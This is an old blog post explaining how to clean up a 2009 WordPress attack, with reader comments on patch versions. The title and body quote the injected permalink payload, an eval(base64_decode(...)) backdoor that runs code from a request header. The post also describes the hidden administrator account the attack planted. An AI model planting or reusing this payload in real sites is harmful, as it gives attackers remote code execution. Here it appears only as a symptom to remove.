UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/







Update 2013:

This post is way old, but people using WordPress still get hacked constantly, so this post we put together may be of some help if you are having problems with wordpress security!

6 Simple Steps To Better WordPress Security

Hey Guys,

Just realized that a lot of people were hit with this latest WordPress Blog Attack – Its a MySQL Injection that screws up your permalinks and in turn makes you blog post links not work! So I figured i’d write up this quick post to help some people out!

It appears that yesterday, many wordpress blogs got hit with this nasty hack that appended a
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Or a
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

to your permalinks which rendered your blog post links useless unless someone physically removed the infected string of code from the URL

To fix things:

  • go to Setting->Permalinks and delete the above mean code

  • go to users, you will notice there are more administrators than usual

  • Put your mouse over the users and find the one that is last to register

  • Right click and copy the edit url, then paste it into the address bar. Also increase the number by 1.

  • You should find the hidden admin with a weird code as a first name. Delete the code and make him a subscriber then return to users and delete him.
    This should fix it. Don’t forget to upgrade your blog to the latest version.

Hope this helps everyone! You can also delete the hidden user from PHPMyAdmin directly from the database, whatever you are comfortable with.

UPDATE: Mashable has written about this issue here.

NEWEST UPDATE: WordPress Responds to Attacks

NEWEST UPDATE: OFFICIAL RESPONSE FROM WORDPRESS

Here are some other good posts on the topic and have other examples that may be more specific to your issue:

http://www.warriorforum.com/main-internet-marketing-discussion-forum/121131-wordpress-mysql-injection-latest-attack-eval-base64_decode-_server-http_referer.html

http://www.netpassiveincome.com/wordpress-mysql-injection-permalink/

http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

If you like this, You'll love These.



About the Author

Andy Sowards

Andy Sowards

Im a professional Freelancer specializing in Web Developer, Design, Programming web applications. Im an Avid member of the Design/Development community and a Serial Blogger. follow me on Twitter @AndySowards



24 Responses to “UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/”

  1. What I Learned from the Wordpress Worm

    […] How to fix the WordPress Worm Related Posts:Client Profile: Relational Energy Healing with Dean RamsdenWordpress gets noticed by USA TodayNew Homepage Copy… Thanks to Tanisha RobinsonWordcamp Columbus coming May 16th to Columbus State Campus"Link Builders Pro" Review and Case Study: Bad Service, No Results […]

    Reply
  2. Dobschat » Montag = Telefontag

    […] mit Abmahnungen auf Fehltritte – es gibt auch technische Gefahren, zum Beispiel mal wieder eine Attacke gegen alten WordPress-Versionen, wer also noch nicht die aktuellste Version eingespielt hat: spätestens jetzt wird es Zeit (selbst […]

    Reply
  3. Mes favoris du 5-09-09 au 7-09-09

    […] Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_… – Cet article a été publié dans Delicious avec les mots-clefs : favoris. Bookmarker le permalien. Laisser un commentaire ou faire un trackback : URL de trackback. « Mes favoris du 3-09-09 au 4-09-09 […]

    Reply
  4. Gaith

    I just deleted the users, but did not delete the user name with a weird code is that enough? also changed cpanel, db and wp passwords?

    Reply
  5. Ben

    Damn. My wordpress is up to date, there’s no extra junk in my permalinks settings and there’s no additional users. But all my links are stuffed. A;; the symptoms of the current bug. I can’t find any info anywhere other than to make sure it’s the latest version which it is. Don’t tell me I have to do a fresh install. Arrrrrggggh!

    Reply
  6. Praxiswissen WordPress » Angriffswelle auf alte WordPress-Versionen

    […] Hier noch ein Lösungsansatz von Andy Sowards, via [email protected] Veröffentlicht am 5. September 2009 um 17:59 von Adler Olivia · Permalink […]

    Reply
  7. Shawn Plep

    Please be careful before spreading information that isn’t proven; it’s most likely that your system was compromised before your upgrade to 2.8.4. Have you looked at your server logs yet? Do you know when the compromise occurred, how it occurred, and which version of WP you were running at that time? THIS is the info we need before we can state which version of WP has a vulnerability.

    Reply
  8. Mark Jaquith

    This was fixed in a round-about way by WordPress 2.8.1

    WordPress 2.8.4 is not vulnerable. It is, however, possible that you were compromised before upgrading, and they still have a user account or have placed an exploit file on your server to allow for ongoing access. Delete user accounts you don’t recognize, and remove foreign PHP files.

    Reply
    • Andy Sowards

      Thanks Mark for chiming in with that info, That could have very well been what happened, Although the attackers must have been planning this for some time then, because there are countless blogs that were attacked the past day or so, Thanks for working hard to defend these attacks!

      Reply
  9. Andy Sowards

    Yes you are correct, I read that as well, BUT Do not know if its 100% Accurate, if that is the case tho then wordpress will have to release 2.8.5 immediately, within the next week

    Reply
  10. Designrfix

    sadly none of these links provide a “fix”… it simply tells you how to scoop up the water flowing in with a tea spoon =/

    Reply
    • Andy Sowards

      Yes unfortunately right now the only thing you can do is update to latest wordpress, and if that doesn’t provide a permanent fix, WordPress will most definitely release 2.8.5 immediately, I will update this post with the latest information

      Reply
      • Designrfix

        hmmm thought i read the vuln. hits 2.8.4 also? (which is the latest) sorry if i’m wrong. can’t go back and check at the moment

Leave a Reply